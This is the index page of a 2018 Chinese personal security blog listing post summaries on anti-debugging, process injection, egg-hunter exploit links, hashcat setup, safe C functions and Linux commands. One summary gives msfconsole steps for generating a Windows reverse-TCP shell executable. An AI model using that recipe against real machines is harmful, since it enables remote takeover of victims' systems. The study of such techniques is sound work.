1 2 3 4 5 ··· 8 下一页
摘要: ComboEdit.h ComboEdit.cpp 效果,右键或者双击启动编辑功能 <Default name="ComboEdit" value="normalimage=&quot;file='res\buttons\combo_normal.png' corner='20,0,20,0'&qu 阅读全文
posted @ 2018-07-05 17:21 m4sterx 阅读(1668) 评论(4) 推荐(0) 编辑
摘要: 详解反调试技术 https://blog.csdn.net/qq_32400847/article/details/52798050 2种基于异常机制的反调试方法 https://blog.csdn.net/lixiangminghate/article/details/47950929 基础反调试 阅读全文
posted @ 2018-06-29 10:16 m4sterx 阅读(496) 评论(0) 推荐(0) 编辑
摘要: # 设置root密码 1.切换到 root sudo su 2.设置密码 passwd 新密码 新密码 #更新ubuntu 的apt资源 apt-get update 稍等。。。 #进行ubuntu系统与软件更新。 apt-get upgrade #安装gcc 编译 apt-get install 阅读全文
posted @ 2018-05-24 10:48 m4sterx 阅读(406) 评论(0) 推荐(0) 编辑
摘要: #hashcat source https://github.com/hashcat/hashcat #an zhuang intel opencl https://blog.csdn.net/qq_28483731/article/details/68235383 https://registra 阅读全文
posted @ 2018-05-21 17:25 m4sterx 阅读(723) 评论(0) 推荐(0) 编辑
摘要: 宽字符集(unicode)操作函数 https://blog.csdn.net/oe516wu/article/details/41379123 阅读全文
posted @ 2018-05-03 11:07 m4sterx 阅读(169) 评论(0) 推荐(0) 编辑
摘要: egg-hunter 很好用的 https://www.pediy.com/kssd/pediy11/120392.html http://www.fuzzysecurity.com/tutorials/expDev/4.html http://www.fuzzysecurity.com/tutor 阅读全文
posted @ 2018-04-04 14:45 m4sterx 阅读(156) 评论(0) 推荐(0) 编辑
摘要: #查看内核版本# uname -a 查看内核版本 cat /proc/version dmesg 查看 printk 输出 其实printk始终是能输出信息的,只不过不一定是到了终端上。我们可以去 /var/log/messages这个文件里面去查看。 如果klogd没有运行,消息不会传递到用户空间 阅读全文
posted @ 2018-03-23 15:12 m4sterx 阅读(126) 评论(0) 推荐(0) 编辑
摘要: 十种注入技巧:具有通用性的进程注入技巧研究 https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process https: 阅读全文
posted @ 2018-03-09 17:10 m4sterx 阅读(155) 评论(0) 推荐(0) 编辑
摘要: 1. gets_s()代替gets() 2.strcpy_s()来代替strcpy() 3.strncpy_s()代替strncpy() 4.sprintf_s()代替sprintf() 5.CString::Format(_T("字符转"))代替CString::Format("字符转") 6.s 阅读全文
posted @ 2018-02-09 13:43 m4sterx 阅读(170) 评论(0) 推荐(0) 编辑
摘要: 1. msfconsole 2. show payloads 3. use windows/shell/reverse_tcp 4. show options 5. set LHOST 192.168.x.x 6. generate -h 7. generate -f r_tcp.exe -t ex 阅读全文
posted @ 2018-02-07 09:02 m4sterx 阅读(637) 评论(0) 推荐(0) 编辑
1 2 3 4 5 ··· 8 下一页